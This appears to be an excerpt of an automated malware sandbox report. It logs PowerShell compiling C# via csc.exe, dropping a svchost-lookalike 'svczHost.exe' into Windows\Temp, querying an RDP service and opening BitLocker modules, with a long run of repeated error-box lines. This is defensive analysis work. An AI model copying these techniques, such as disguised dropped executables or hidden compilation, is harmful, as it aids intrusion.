        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline"Jump to behavior
        Source: svczHost.exe.11.drStatic PE information: section name: .managed
        Source: svczHost.exe.11.drStatic PE information: section name: hydrated
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F54158 push E8FFFFFFh; iretd 0_2_00007FF848F5415D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F57C2E pushad ; retf 0_2_00007FF848F57C5D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F57C5E push eax; retf 0_2_00007FF848F57C6D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F5786E pushad ; retf 0_2_00007FF848F5789D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F5789E push eax; retf 0_2_00007FF848F578AD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF849017A0E push cs; ret 0_2_00007FF849017A0F
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848DFD2A5 pushad ; iretd 5_2_00007FF848DFD2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F14E28 pushfd ; ret 5_2_00007FF848F14F11
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F10D3F push eax; iretd 5_2_00007FF848F10D49
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848E0D2A5 pushad ; iretd 11_2_00007FF848E0D2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF848F28128 push ebx; ret 11_2_00007FF848F2816A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF849464E79 push es; ret 11_2_00007FF849464FA7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FF848F42360 push eax; iretd 24_2_00007FF848F4237D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FF848F2795F push ebx; retf 28_2_00007FF848F2796A
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.dllJump to dropped file
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\svczHost.exeJump to dropped file
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
